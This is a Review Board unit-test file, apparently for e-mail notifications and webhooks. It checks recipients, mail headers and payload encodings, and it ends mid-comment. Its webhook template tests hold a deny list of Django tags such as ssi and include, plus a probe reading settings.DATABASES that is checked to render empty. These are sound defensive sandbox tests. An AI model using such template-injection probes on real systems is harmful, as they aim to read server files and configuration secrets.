from __future__ import unicode_literals
import logging
from django.conf import settings
from django.contrib.auth.models import User
from django.core import mail
from django.template import TemplateSyntaxError
from django.utils.datastructures import MultiValueDict
from django.utils.six.moves.urllib.request import urlopen
from djblets.siteconfig.models import SiteConfiguration
from djblets.testing.decorators import add_fixtures
from kgb import SpyAgency
from reviewboard.accounts.models import Profile, ReviewRequestVisit
from reviewboard.admin.siteconfig import load_site_config
from reviewboard.diffviewer.models import FileDiff
from reviewboard.notifications.email import (build_email_address,
build_recipients,
get_email_address_for_user,
get_email_addresses_for_group,
recipients_to_addresses,
send_review_mail)
from reviewboard.notifications.models import WebHookTarget
from reviewboard.notifications.webhooks import (FakeHTTPRequest,
dispatch_webhook_event,
render_custom_content)
from reviewboard.reviews.models import (Group,
Review,
ReviewRequest,
ReviewRequestDraft)
from reviewboard.scmtools.core import PRE_CREATION
from reviewboard.site.models import LocalSite
from reviewboard.testing import TestCase
_CONSOLE_EMAIL_BACKEND = 'django.core.mail.backends.console.EmailBackend'
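# Django's console e-mail backend writes messages to stdout instead of
# attempting delivery, which lets the unicode tests below exercise the full
# message-building path (headers, encoding, and all) without a mail server.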
class EmailTestHelper(object):
def setUp(self):
super(EmailTestHelper, self).setUp()
mail.outbox = []
self.sender = 'noreply@example.com'
    def assertValidRecipients(self, user_list, group_list=None):
        group_list = group_list or []
        recipient_list = mail.outbox[0].to + mail.outbox[0].cc
self.assertEqual(len(recipient_list), len(user_list) + len(group_list))
        for user in user_list:
            self.assertIn(get_email_address_for_user(
                              User.objects.get(username=user)),
                          recipient_list,
                          'user %s was not found in the recipient list' % user)
        groups = Group.objects.filter(name__in=group_list, local_site=None)
        for group in groups:
            for address in get_email_addresses_for_group(group):
                self.assertIn(
                    address, recipient_list,
                    'address %s (for group %s) was not found in the '
                    'recipient list' % (address, group.name))
class UserEmailTests(EmailTestHelper, TestCase):
def setUp(self):
super(UserEmailTests, self).setUp()
siteconfig = SiteConfiguration.objects.get_current()
siteconfig.set("mail_send_new_user_mail", True)
siteconfig.save()
load_site_config()
def test_new_user_email(self):
"""
Testing sending an e-mail after a new user has successfully registered.
"""
new_user_info = {
'username': 'NewUser',
'password1': 'password',
'password2': 'password',
'email': 'newuser@example.com',
'first_name': 'New',
'last_name': 'User'
}
        # The registration request has to be sent twice, since djblets needs
        # to validate cookies on the second request.
self.client.get('/account/register/', new_user_info)
self.client.post('/account/register/', new_user_info)
siteconfig = SiteConfiguration.objects.get_current()
admin_name = siteconfig.get('site_admin_name')
admin_email_addr = siteconfig.get('site_admin_email')
self.assertEqual(len(mail.outbox), 1)
email = mail.outbox[0]
self.assertEqual(email.subject,
"New Review Board user registration for NewUser")
self.assertEqual(email.from_email, self.sender)
self.assertEqual(email.extra_headers['From'], settings.SERVER_EMAIL)
self.assertEqual(email.to[0], build_email_address(admin_name,
admin_email_addr))
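# The tests below repeatedly assert the same header layout: the envelope
# sender (message.from_email) stays pinned to the configured default address,
# the visible 'From' header shows the acting user, and the 'Sender' header
# (checked via _get_sender) pairs the user's full name with the trusted site
# address rather than forging mail directly from the user's own address.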
class ReviewRequestEmailTests(EmailTestHelper, SpyAgency, TestCase):
"""Tests the e-mail support."""
fixtures = ['test_users']
def setUp(self):
super(ReviewRequestEmailTests, self).setUp()
siteconfig = SiteConfiguration.objects.get_current()
siteconfig.set("mail_send_review_mail", True)
siteconfig.set("mail_default_from", self.sender)
siteconfig.save()
load_site_config()
def test_new_review_request_email(self):
"""Testing sending an e-mail when creating a new review request"""
review_request = self.create_review_request(
summary='My test review request')
review_request.target_people.add(User.objects.get(username='grumpy'))
review_request.target_people.add(User.objects.get(username='doc'))
review_request.publish(review_request.submitter)
from_email = get_email_address_for_user(review_request.submitter)
self.assertEqual(len(mail.outbox), 1)
self.assertEqual(mail.outbox[0].from_email, self.sender)
self.assertEqual(mail.outbox[0].extra_headers['From'], from_email)
self.assertEqual(mail.outbox[0].subject,
'Review Request %s: My test review request'
% review_request.pk)
self.assertValidRecipients(['grumpy', 'doc'])
message = mail.outbox[0].message()
self.assertEqual(message['Sender'],
self._get_sender(review_request.submitter))
def test_review_request_email_local_site_group(self):
"""Testing sending email when a group member is part of a Local Site"""
# This was bug 3581.
local_site = LocalSite.objects.create(name=self.local_site_name)
group = self.create_review_group()
user = User.objects.get(username='grumpy')
local_site.users.add(user)
local_site.admins.add(user)
local_site.save()
group.users.add(user)
group.save()
review_request = self.create_review_request()
review_request.target_groups.add(group)
review_request.publish(review_request.submitter)
self.assertEqual(len(mail.outbox), 1)
self.assertValidRecipients(['doc', 'grumpy'])
def test_review_email(self):
"""Testing sending an e-mail when replying to a review request"""
review_request = self.create_review_request(
summary='My test review request')
review_request.target_people.add(User.objects.get(username='grumpy'))
review_request.target_people.add(User.objects.get(username='doc'))
review_request.publish(review_request.submitter)
# Clear the outbox.
mail.outbox = []
review = self.create_review(review_request=review_request)
review.publish()
from_email = get_email_address_for_user(review.user)
self.assertEqual(len(mail.outbox), 1)
email = mail.outbox[0]
self.assertEqual(email.from_email, self.sender)
self.assertEqual(email.extra_headers['From'], from_email)
self.assertEqual(email._headers['X-ReviewBoard-URL'],
'http://example.com/')
self.assertEqual(email._headers['X-ReviewRequest-URL'],
'http://example.com/r/%s/'
% review_request.display_id)
self.assertEqual(email.subject,
'Re: Review Request %s: My test review request'
% review_request.display_id)
self.assertValidRecipients([
review_request.submitter.username,
'grumpy',
'doc',
])
message = email.message()
self.assertEqual(message['Sender'], self._get_sender(review.user))
@add_fixtures(['test_site'])
def test_review_email_with_site(self):
"""Testing sending an e-mail when replying to a review request
on a Local Site
"""
review_request = self.create_review_request(
summary='My test review request',
with_local_site=True)
review_request.target_people.add(User.objects.get(username='grumpy'))
review_request.target_people.add(User.objects.get(username='doc'))
review_request.publish(review_request.submitter)
# Ensure all the reviewers are on the site.
site = review_request.local_site
site.users.add(*list(review_request.target_people.all()))
# Clear the outbox.
mail.outbox = []
review = self.create_review(review_request=review_request)
review.publish()
from_email = get_email_address_for_user(review.user)
self.assertEqual(len(mail.outbox), 1)
email = mail.outbox[0]
self.assertEqual(email.from_email, self.sender)
self.assertEqual(email.extra_headers['From'], from_email)
self.assertEqual(email._headers['X-ReviewBoard-URL'],
'http://example.com/s/local-site-1/')
self.assertEqual(email._headers['X-ReviewRequest-URL'],
'http://example.com/s/local-site-1/r/%s/'
% review_request.display_id)
self.assertEqual(email.subject,
'Re: Review Request %s: My test review request'
% review_request.display_id)
self.assertValidRecipients([
review_request.submitter.username,
'grumpy',
'doc',
])
message = email.message()
self.assertEqual(message['Sender'], self._get_sender(review.user))
def test_profile_should_send_email_setting(self):
"""Testing the Profile.should_send_email setting"""
grumpy = User.objects.get(username='grumpy')
profile = grumpy.get_profile()
profile.should_send_email = False
profile.save()
review_request = self.create_review_request(
summary='My test review request')
review_request.target_people.add(grumpy)
review_request.target_people.add(User.objects.get(username='doc'))
review_request.publish(review_request.submitter)
self.assertEqual(len(mail.outbox), 1)
self.assertValidRecipients(['doc'])
def test_review_close_no_email(self):
"""Tests e-mail is not generated when a review is closed and e-mail
setting is False
"""
review_request = self.create_review_request()
review_request.publish(review_request.submitter)
# Clear the outbox.
mail.outbox = []
review_request.close(ReviewRequest.SUBMITTED, review_request.submitter)
        # Verify that no e-mail is generated, as the option is False by
        # default.
self.assertEqual(len(mail.outbox), 0)
def test_review_close_with_email(self):
"""Tests e-mail is generated when a review is closed and e-mail setting
is True
"""
siteconfig = SiteConfiguration.objects.get_current()
siteconfig.set("mail_send_review_close_mail", True)
siteconfig.save()
load_site_config()
review_request = self.create_review_request()
review_request.publish(review_request.submitter)
# Clear the outbox.
mail.outbox = []
review_request.close(ReviewRequest.SUBMITTED, review_request.submitter)
self.assertEqual(len(mail.outbox), 1)
message = mail.outbox[0].message()
self.assertTrue("This change has been marked as submitted"
in message.as_string())
# Reset settings for review close requests
siteconfig.set("mail_send_review_close_mail", False)
siteconfig.save()
load_site_config()
def test_review_to_submitter_only(self):
"""Test that e-mails from reviews published to the submitter only will
only go to the submitter and the reviewer
"""
siteconfig = SiteConfiguration.objects.get_current()
siteconfig.set('mail_send_review_mail', True)
siteconfig.save()
review_request = self.create_review_request(public=True, publish=False)
review_request.target_people = [User.objects.get(username='grumpy')]
review_request.save()
review = self.create_review(review_request=review_request,
publish=False)
review.publish(to_submitter_only=True)
self.assertEqual(len(mail.outbox), 1)
message = mail.outbox[0]
self.assertEqual(message.cc, [])
self.assertEqual(len(message.to), 2)
self.assertEqual(
set(message.to),
set([get_email_address_for_user(review.user),
get_email_address_for_user(review_request.submitter)]))
def test_review_reply_email(self):
"""Testing sending an e-mail when replying to a review"""
review_request = self.create_review_request(
summary='My test review request')
review_request.publish(review_request.submitter)
base_review = self.create_review(review_request=review_request)
base_review.publish()
# Clear the outbox.
mail.outbox = []
reply = self.create_reply(base_review)
reply.publish()
from_email = get_email_address_for_user(reply.user)
self.assertEqual(len(mail.outbox), 1)
self.assertEqual(mail.outbox[0].from_email, self.sender)
self.assertEqual(mail.outbox[0].extra_headers['From'], from_email)
self.assertEqual(mail.outbox[0].subject,
'Re: Review Request %s: My test review request'
% review_request.pk)
self.assertValidRecipients([
review_request.submitter.username,
base_review.user.username,
reply.user.username,
])
message = mail.outbox[0].message()
self.assertEqual(message['Sender'], self._get_sender(reply.user))
def test_update_review_request_email(self):
"""Testing sending an e-mail when updating a review request"""
group = Group.objects.create(name='devgroup',
mailing_list='devgroup@example.com')
review_request = self.create_review_request(
summary='My test review request')
review_request.target_groups.add(group)
review_request.email_message_id = "junk"
review_request.publish(review_request.submitter)
from_email = get_email_address_for_user(review_request.submitter)
self.assertEqual(len(mail.outbox), 1)
self.assertEqual(mail.outbox[0].from_email, self.sender)
self.assertEqual(mail.outbox[0].extra_headers['From'], from_email)
self.assertEqual(mail.outbox[0].subject,
'Re: Review Request %s: My test review request'
% review_request.pk)
self.assertValidRecipients([review_request.submitter.username],
['devgroup'])
message = mail.outbox[0].message()
self.assertEqual(message['Sender'],
self._get_sender(review_request.submitter))
def test_add_reviewer_review_request_email(self):
"""Testing limited e-mail recipients
when adding a reviewer to an existing review request
"""
review_request = self.create_review_request(
summary='My test review request',
public=True)
review_request.email_message_id = "junk"
review_request.target_people.add(User.objects.get(username='dopey'))
review_request.save()
draft = ReviewRequestDraft.create(review_request)
draft.target_people.add(User.objects.get(username='grumpy'))
draft.publish(user=review_request.submitter)
from_email = get_email_address_for_user(review_request.submitter)
self.assertEqual(len(mail.outbox), 1)
self.assertEqual(mail.outbox[0].from_email, self.sender)
self.assertEqual(mail.outbox[0].extra_headers['From'], from_email)
self.assertEqual(mail.outbox[0].subject,
'Re: Review Request %s: My test review request'
% review_request.pk)
# The only included users should be the submitter and 'grumpy' (not
# 'dopey', since he was already included on the review request earlier)
self.assertValidRecipients([review_request.submitter.username,
'grumpy'])
message = mail.outbox[0].message()
self.assertEqual(message['Sender'],
self._get_sender(review_request.submitter))
def test_add_group_review_request_email(self):
"""Testing limited e-mail recipients
when adding a group to an existing review request
"""
existing_group = Group.objects.create(
name='existing', mailing_list='existing@example.com')
review_request = self.create_review_request(
summary='My test review request',
public=True)
review_request.email_message_id = "junk"
review_request.target_groups.add(existing_group)
review_request.target_people.add(User.objects.get(username='dopey'))
review_request.save()
new_group = Group.objects.create(name='devgroup',
mailing_list='devgroup@example.com')
draft = ReviewRequestDraft.create(review_request)
draft.target_groups.add(new_group)
draft.publish(user=review_request.submitter)
from_email = get_email_address_for_user(review_request.submitter)
self.assertEqual(len(mail.outbox), 1)
self.assertEqual(mail.outbox[0].from_email, self.sender)
self.assertEqual(mail.outbox[0].extra_headers['From'], from_email)
self.assertEqual(mail.outbox[0].subject,
'Re: Review Request %s: My test review request'
% review_request.pk)
# The only included users should be the submitter and 'devgroup' (not
# 'dopey' or 'existing', since they were already included on the
# review request earlier)
self.assertValidRecipients([review_request.submitter.username],
['devgroup'])
message = mail.outbox[0].message()
self.assertEqual(message['Sender'],
self._get_sender(review_request.submitter))
def test_limited_recipients_other_fields(self):
"""Testing that recipient limiting only happens when adding reviewers
"""
review_request = self.create_review_request(
summary='My test review request',
public=True)
review_request.email_message_id = "junk"
review_request.target_people.add(User.objects.get(username='dopey'))
review_request.save()
draft = ReviewRequestDraft.create(review_request)
draft.summary = 'Changed summary'
draft.target_people.add(User.objects.get(username='grumpy'))
draft.publish(user=review_request.submitter)
from_email = get_email_address_for_user(review_request.submitter)
self.assertEqual(len(mail.outbox), 1)
self.assertEqual(mail.outbox[0].from_email, self.sender)
self.assertEqual(mail.outbox[0].extra_headers['From'], from_email)
self.assertEqual(mail.outbox[0].subject,
'Re: Review Request %s: Changed summary'
% review_request.pk)
self.assertValidRecipients([review_request.submitter.username,
'dopey', 'grumpy'])
message = mail.outbox[0].message()
self.assertEqual(message['Sender'],
self._get_sender(review_request.submitter))
def test_limited_recipients_no_email(self):
"""Testing limited e-mail recipients when operation results in zero
recipients
"""
review_request = self.create_review_request(
summary='My test review request',
public=True)
review_request.email_message_id = "junk"
review_request.target_people.add(User.objects.get(username='dopey'))
review_request.save()
profile, is_new = Profile.objects.get_or_create(
user=review_request.submitter)
profile.should_send_own_updates = False
profile.save()
draft = ReviewRequestDraft.create(review_request)
draft.target_people.remove(User.objects.get(username='dopey'))
draft.publish(user=review_request.submitter)
self.assertEqual(len(mail.outbox), 0)
def test_recipients_with_muted_review_requests(self):
"""Testing e-mail recipients when users mute a review request"""
dopey = User.objects.get(username='dopey')
admin = User.objects.get(username='admin')
group = Group.objects.create(name='group')
group.users.add(admin)
group.save()
review_request = self.create_review_request(
summary='My test review request',
public=True)
review_request.target_people.add(dopey)
review_request.target_people.add(User.objects.get(username='grumpy'))
review_request.target_groups.add(group)
review_request.save()
visit = self.create_visit(review_request, ReviewRequestVisit.MUTED,
dopey)
visit.save()
visit = self.create_visit(review_request, ReviewRequestVisit.MUTED,
admin)
visit.save()
draft = ReviewRequestDraft.create(review_request)
draft.summary = 'Summary changed'
draft.publish(user=review_request.submitter)
self.assertEqual(len(mail.outbox), 1)
self.assertValidRecipients(['doc', 'grumpy'])
def test_local_site_user_filters(self):
"""Testing sending e-mails and filtering out users not on a local site
"""
test_site = LocalSite.objects.create(name=self.local_site_name)
site_user1 = User.objects.create(
username='site_user1',
email='site_user1@example.com')
site_user2 = User.objects.create(
username='site_user2',
email='site_user2@example.com')
site_user3 = User.objects.create(
username='site_user3',
email='site_user3@example.com')
site_user4 = User.objects.create(
username='site_user4',
email='site_user4@example.com')
site_user5 = User.objects.create(
username='site_user5',
email='site_user5@example.com')
non_site_user1 = User.objects.create(
username='non_site_user1',
email='non_site_user1@example.com')
non_site_user2 = User.objects.create(
username='non_site_user2',
email='non_site_user2@example.com')
non_site_user3 = User.objects.create(
username='non_site_user3',
email='non_site_user3@example.com')
test_site.admins.add(site_user1)
test_site.users.add(site_user2)
test_site.users.add(site_user3)
test_site.users.add(site_user4)
test_site.users.add(site_user5)
group = Group.objects.create(name='my-group',
display_name='My Group',
local_site=test_site)
group.users.add(site_user5)
group.users.add(non_site_user3)
review_request = self.create_review_request(with_local_site=True,
local_id=123)
review_request.email_message_id = "junk"
review_request.target_people = [site_user1, site_user2, site_user3,
non_site_user1]
review_request.target_groups = [group]
review = Review.objects.create(review_request=review_request,
user=site_user4)
review.publish()
review = Review.objects.create(review_request=review_request,
user=non_site_user2)
review.publish()
from_email = get_email_address_for_user(review_request.submitter)
# Now that we're set up, send another e-mail.
mail.outbox = []
review_request.publish(review_request.submitter)
self.assertEqual(len(mail.outbox), 1)
self.assertEqual(mail.outbox[0].from_email, self.sender)
self.assertEqual(mail.outbox[0].extra_headers['From'], from_email)
self.assertValidRecipients(
['site_user1', 'site_user2', 'site_user3', 'site_user4',
'site_user5', review_request.submitter.username], [])
message = mail.outbox[0].message()
self.assertEqual(message['Sender'],
self._get_sender(review_request.submitter))
def test_review_request_email_with_unicode_summary(self):
"""Testing sending a review request e-mail with a unicode subject"""
self.spy_on(logging.exception)
with self.settings(EMAIL_BACKEND=_CONSOLE_EMAIL_BACKEND):
review_request = self.create_review_request()
review_request.summary = '\ud83d\ude04'
review_request.target_people.add(User.objects.get(
username='grumpy'))
review_request.target_people.add(User.objects.get(username='doc'))
review_request.publish(review_request.submitter)
self.assertIsNotNone(review_request.email_message_id)
self.assertFalse(logging.exception.spy.called)
def test_review_request_email_with_unicode_description(self):
"""Testing sending a review request e-mail with a unicode
description
"""
self.spy_on(logging.exception)
with self.settings(EMAIL_BACKEND=_CONSOLE_EMAIL_BACKEND):
review_request = self.create_review_request()
review_request.description = '\ud83d\ude04'
review_request.target_people.add(
User.objects.get(username='grumpy'))
review_request.target_people.add(
User.objects.get(username='doc'))
review_request.publish(review_request.submitter)
self.assertIsNotNone(review_request.email_message_id)
self.assertFalse(logging.exception.spy.called)
@add_fixtures(['test_scmtools'])
def test_review_request_email_with_added_file(self):
"""Testing sending a review request e-mail with added files in the
diffset
"""
repository = self.create_repository(tool_name='Test')
review_request = self.create_review_request(repository=repository)
diffset = self.create_diffset(review_request=review_request)
filediff = self.create_filediff(diffset=diffset,
source_file='/dev/null',
source_revision=PRE_CREATION)
review_request.publish(review_request.submitter)
self.assertEqual(len(mail.outbox), 1)
message = mail.outbox[0]
        self.assertIn('X-ReviewBoard-Diff-For', message._headers)
        diff_headers = message._headers.getlist('X-ReviewBoard-Diff-For')
        self.assertEqual(len(diff_headers), 1)
        self.assertNotIn(filediff.source_file, diff_headers)
        self.assertIn(filediff.dest_file, diff_headers)
@add_fixtures(['test_scmtools'])
def test_review_request_email_with_deleted_file(self):
"""Testing sending a review request e-mail with deleted files in the
diffset
"""
repository = self.create_repository(tool_name='Test')
review_request = self.create_review_request(repository=repository)
diffset = self.create_diffset(review_request=review_request)
filediff = self.create_filediff(diffset=diffset,
dest_file='/dev/null',
status=FileDiff.DELETED)
review_request.publish(review_request.submitter)
self.assertEqual(len(mail.outbox), 1)
message = mail.outbox[0]
        self.assertIn('X-ReviewBoard-Diff-For', message._headers)
        diff_headers = message._headers.getlist('X-ReviewBoard-Diff-For')
        self.assertEqual(len(diff_headers), 1)
        self.assertIn(filediff.source_file, diff_headers)
        self.assertNotIn(filediff.dest_file, diff_headers)
@add_fixtures(['test_scmtools'])
def test_review_request_email_with_moved_file(self):
"""Testing sending a review request e-mail with moved files in the
diffset
"""
repository = self.create_repository(tool_name='Test')
review_request = self.create_review_request(repository=repository)
diffset = self.create_diffset(review_request=review_request)
filediff = self.create_filediff(diffset=diffset,
source_file='foo',
dest_file='bar',
status=FileDiff.MOVED)
review_request.publish(review_request.submitter)
self.assertEqual(len(mail.outbox), 1)
message = mail.outbox[0]
        self.assertIn('X-ReviewBoard-Diff-For', message._headers)
        diff_headers = message._headers.getlist('X-ReviewBoard-Diff-For')
        self.assertEqual(len(diff_headers), 2)
        self.assertIn(filediff.source_file, diff_headers)
        self.assertIn(filediff.dest_file, diff_headers)
@add_fixtures(['test_scmtools'])
def test_review_request_email_with_copied_file(self):
"""Testing sending a review request e-mail with copied files in the
diffset
"""
repository = self.create_repository(tool_name='Test')
review_request = self.create_review_request(repository=repository)
diffset = self.create_diffset(review_request=review_request)
filediff = self.create_filediff(diffset=diffset,
source_file='foo',
dest_file='bar',
status=FileDiff.COPIED)
review_request.publish(review_request.submitter)
self.assertEqual(len(mail.outbox), 1)
message = mail.outbox[0]
        self.assertIn('X-ReviewBoard-Diff-For', message._headers)
        diff_headers = message._headers.getlist('X-ReviewBoard-Diff-For')
        self.assertEqual(len(diff_headers), 2)
        self.assertIn(filediff.source_file, diff_headers)
        self.assertIn(filediff.dest_file, diff_headers)
@add_fixtures(['test_scmtools'])
def test_review_request_email_with_multiple_files(self):
"""Testing sending a review request e-mail with multiple files in the
diffset
"""
repository = self.create_repository(tool_name='Test')
review_request = self.create_review_request(repository=repository)
diffset = self.create_diffset(review_request=review_request)
filediffs = [
self.create_filediff(diffset=diffset,
source_file='foo',
dest_file='bar',
status=FileDiff.MOVED),
self.create_filediff(diffset=diffset,
source_file='baz',
dest_file='/dev/null',
status=FileDiff.DELETED)
]
review_request.publish(review_request.submitter)
self.assertEqual(len(mail.outbox), 1)
message = mail.outbox[0]
        self.assertIn('X-ReviewBoard-Diff-For', message._headers)
        diff_headers = message._headers.getlist('X-ReviewBoard-Diff-For')
        self.assertEqual(len(diff_headers), 3)
        self.assertIn(filediffs[0].source_file, diff_headers)
        self.assertIn(filediffs[0].dest_file, diff_headers)
        self.assertIn(filediffs[1].source_file, diff_headers)
        self.assertNotIn(filediffs[1].dest_file, diff_headers)
def test_extra_headers_dict(self):
"""Testing sending extra headers as a dict with an e-mail message"""
review_request = self.create_review_request()
submitter = review_request.submitter
send_review_mail(submitter,
review_request,
'Foo',
None,
[submitter],
[],
'notifications/review_request_email.txt',
'notifications/review_request_email.html',
extra_headers={
'X-Foo': 'Bar'
})
self.assertEqual(len(mail.outbox), 1)
message = mail.outbox[0]
self.assertIn('X-Foo', message._headers)
self.assertEqual(message._headers['X-Foo'], 'Bar')
def test_extra_headers_multivalue_dict(self):
"""Testing sending extra headers as a MultiValueDict with an e-mail
message
"""
header_values = ['Bar', 'Baz']
review_request = self.create_review_request()
submitter = review_request.submitter
send_review_mail(review_request.submitter,
review_request,
'Foo',
None,
[submitter],
[],
'notifications/review_request_email.txt',
'notifications/review_request_email.html',
extra_headers=MultiValueDict({
'X-Foo': header_values,
}))
self.assertEqual(len(mail.outbox), 1)
message = mail.outbox[0]
self.assertIn('X-Foo', message._headers)
self.assertEqual(set(message._headers.getlist('X-Foo')),
set(header_values))
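        # The getlist() values are compared as sets above because the
        # relative order of repeated headers is not part of the contract
        # being tested.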
def test_review_no_shipit_headers(self):
"""Testing sending a review e-mail without a 'Ship It!'"""
review_request = self.create_review_request(public=True)
self.create_review(review_request,
body_top=Review.SHIP_IT_TEXT,
body_bottom='',
publish=True)
self.assertEqual(len(mail.outbox), 1)
message = mail.outbox[0]
self.assertNotIn('X-ReviewBoard-ShipIt', message._headers)
self.assertNotIn('X-ReviewBoard-ShipIt-Only', message._headers)
def test_review_shipit_only_headers(self):
"""Testing sending a review e-mail with only a 'Ship It!'"""
review_request = self.create_review_request(public=True)
self.create_review(review_request,
body_top=Review.SHIP_IT_TEXT,
body_bottom='',
ship_it=True,
publish=True)
self.assertEqual(len(mail.outbox), 1)
message = mail.outbox[0]
self.assertIn('X-ReviewBoard-ShipIt', message._headers)
self.assertIn('X-ReviewBoard-ShipIt-Only', message._headers)
def test_review_shipit_only_headers_no_text(self):
"""Testing sending a review e-mail with only a 'Ship It!' and no text
"""
review_request = self.create_review_request(public=True)
self.create_review(review_request,
body_top='',
body_bottom='',
ship_it=True,
publish=True)
self.assertEqual(len(mail.outbox), 1)
message = mail.outbox[0]
self.assertIn('X-ReviewBoard-ShipIt', message._headers)
self.assertIn('X-ReviewBoard-ShipIt-Only', message._headers)
def test_review_shipit_headers_custom_top_text(self):
"""Testing sending a review e-mail with a 'Ship It' and custom top text
"""
review_request = self.create_review_request(public=True)
self.create_review(review_request,
body_top='Some general information.',
body_bottom='',
ship_it=True,
publish=True)
self.assertEqual(len(mail.outbox), 1)
message = mail.outbox[0]
self.assertIn('X-ReviewBoard-ShipIt', message._headers)
self.assertNotIn('X-ReviewBoard-ShipIt-Only', message._headers)
def test_review_shipit_headers_bottom_text(self):
"""Testing sending a review e-mail with a 'Ship It' and bottom text"""
review_request = self.create_review_request(public=True)
self.create_review(review_request,
body_top=Review.SHIP_IT_TEXT,
body_bottom='Some comments',
ship_it=True,
publish=True)
self.assertEqual(len(mail.outbox), 1)
message = mail.outbox[0]
self.assertIn('X-ReviewBoard-ShipIt', message._headers)
self.assertNotIn('X-ReviewBoard-ShipIt-Only', message._headers)
@add_fixtures(['test_scmtools'])
def test_review_shipit_headers_comments(self):
"""Testing sending a review e-mail with a 'Ship It' and diff comments
"""
repository = self.create_repository(tool_name='Test')
review_request = self.create_review_request(repository=repository,
public=True)
diffset = self.create_diffset(review_request)
filediff = self.create_filediff(diffset)
review = self.create_review(review_request,
body_top=Review.SHIP_IT_TEXT,
body_bottom='',
ship_it=True,
publish=False)
self.create_diff_comment(review, filediff)
review.publish()
self.assertEqual(len(mail.outbox), 1)
message = mail.outbox[0]
self.assertIn('X-ReviewBoard-ShipIt', message._headers)
self.assertNotIn('X-ReviewBoard-ShipIt-Only', message._headers)
def test_review_shipit_headers_attachment_comments(self):
"""Testing sending a review e-mail with a 'Ship It' and file attachment
comments
"""
review_request = self.create_review_request(public=True)
file_attachment = self.create_file_attachment(review_request)
review = self.create_review(review_request,
body_top=Review.SHIP_IT_TEXT,
body_bottom='',
ship_it=True,
publish=False)
self.create_file_attachment_comment(review, file_attachment)
review.publish()
self.assertEqual(len(mail.outbox), 1)
message = mail.outbox[0]
self.assertIn('X-ReviewBoard-ShipIt', message._headers)
self.assertNotIn('X-ReviewBoard-ShipIt-Only', message._headers)
def test_review_shipit_headers_screenshot_comments(self):
"""Testing sending a review e-mail with a 'Ship It' and screenshot
comments
"""
review_request = self.create_review_request(public=True)
screenshot = self.create_screenshot(review_request)
review = self.create_review(review_request,
body_top=Review.SHIP_IT_TEXT,
body_bottom='',
ship_it=True,
publish=False)
self.create_screenshot_comment(review, screenshot)
review.publish()
self.assertEqual(len(mail.outbox), 1)
message = mail.outbox[0]
self.assertIn('X-ReviewBoard-ShipIt', message._headers)
self.assertNotIn('X-ReviewBoard-ShipIt-Only', message._headers)
def _get_sender(self, user):
return build_email_address(user.get_full_name(), self.sender)
class WebHookCustomContentTests(TestCase):
"""Unit tests for render_custom_content."""
def test_with_valid_template(self):
"""Tests render_custom_content with a valid template"""
s = render_custom_content(
'{% if mybool %}{{s1}}{% else %}{{s2}}{% endif %}',
{
'mybool': True,
's1': 'Hi!',
's2': 'Bye!',
})
self.assertEqual(s, 'Hi!')
def test_with_blocked_block_tag(self):
"""Tests render_custom_content with blocked {% block %}"""
with self.assertRaisesMessage(TemplateSyntaxError,
"Invalid block tag: 'block'"):
            render_custom_content('{% block foo %}{% endblock %}')
def test_with_blocked_debug_tag(self):
"""Tests render_custom_content with blocked {% debug %}"""
with self.assertRaisesMessage(TemplateSyntaxError,
"Invalid block tag: 'debug'"):
render_custom_content('{% debug %}')
def test_with_blocked_extends_tag(self):
"""Tests render_custom_content with blocked {% extends %}"""
with self.assertRaisesMessage(TemplateSyntaxError,
"Invalid block tag: 'extends'"):
render_custom_content('{% extends "base.html" %}')
def test_with_blocked_include_tag(self):
"""Tests render_custom_content with blocked {% include %}"""
with self.assertRaisesMessage(TemplateSyntaxError,
"Invalid block tag: 'include'"):
render_custom_content('{% include "base.html" %}')
def test_with_blocked_load_tag(self):
"""Tests render_custom_content with blocked {% load %}"""
with self.assertRaisesMessage(TemplateSyntaxError,
"Invalid block tag: 'load'"):
render_custom_content('{% load i18n %}')
def test_with_blocked_ssi_tag(self):
"""Tests render_custom_content with blocked {% ssi %}"""
with self.assertRaisesMessage(TemplateSyntaxError,
"Invalid block tag: 'ssi'"):
render_custom_content('{% ssi "foo.html" %}')
def test_with_unknown_vars(self):
"""Tests render_custom_content with unknown variables"""
s = render_custom_content('{{settings.DEBUG}};{{settings.DATABASES}}')
self.assertEqual(s, ';')
class WebHookDispatchTests(SpyAgency, TestCase):
"""Unit tests for dispatching webhooks."""
ENDPOINT_URL = 'http://example.com/endpoint/'
def test_dispatch_custom_payload(self):
"""Test dispatch_webhook_event with custom payload"""
custom_content = (
'{\n'
'{% for i in items %}'
' "item{{i}}": true{% if not forloop.last %},{% endif %}\n'
'{% endfor %}'
'}')
handler = WebHookTarget(events='my-event',
url=self.ENDPOINT_URL,
encoding=WebHookTarget.ENCODING_JSON,
use_custom_content=True,
custom_content=custom_content)
self._test_dispatch(
handler,
'my-event',
{
'items': [1, 2, 3],
},
'application/json',
('{\n'
' "item1": true,\n'
' "item2": true,\n'
' "item3": true\n'
'}'))
def test_dispatch_form_data(self):
"""Test dispatch_webhook_event with Form Data payload"""
handler = WebHookTarget(events='my-event',
url=self.ENDPOINT_URL,
encoding=WebHookTarget.ENCODING_FORM_DATA)
self._test_dispatch(
handler,
'my-event',
{
'items': [1, 2, 3],
},
'application/x-www-form-urlencoded',
'payload=%7B%22items%22%3A+%5B1%2C+2%2C+3%5D%7D')
def test_dispatch_json(self):
"""Test dispatch_webhook_event with JSON payload"""
handler = WebHookTarget(events='my-event',
url=self.ENDPOINT_URL,
encoding=WebHookTarget.ENCODING_JSON)
self._test_dispatch(
handler,
'my-event',
{
'items': [1, 2, 3],
},
'application/json',
'{"items": [1, 2, 3]}')
def test_dispatch_xml(self):
"""Test dispatch_webhook_event with XML payload"""
handler = WebHookTarget(events='my-event',
url=self.ENDPOINT_URL,
encoding=WebHookTarget.ENCODING_XML)
self._test_dispatch(
handler,
'my-event',
{
'items': [1, 2, 3],
},
'application/xml',
('<?xml version="1.0" encoding="utf-8"?>\n'
'<rsp>\n'
' <items>\n'
' <array>\n'
' <item>1</item>\n'
' <item>2</item>\n'
' <item>3</item>\n'
' </array>\n'
' </items>\n'
'</rsp>'))
def test_dispatch_with_secret(self):
"""Test dispatch_webhook_event with HMAC secret"""
handler = WebHookTarget(events='my-event',
url=self.ENDPOINT_URL,
encoding=WebHookTarget.ENCODING_JSON,
secret='foobar123')
self._test_dispatch(
handler,
'my-event',
{
'items': [1, 2, 3],
},
'application/json',
'{"items": [1, 2, 3]}',
'sha1=cf27ad0de6b5f0c4e77e45bec9f4846e')
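        # A minimal sketch of where the signature above comes from, assuming
        # the GitHub-style HMAC convention (hex HMAC digest of the raw
        # payload, keyed with the target's secret):
        #
        #     import hashlib
        #     import hmac
        #
        #     sig = 'sha1=' + hmac.new(b'foobar123',
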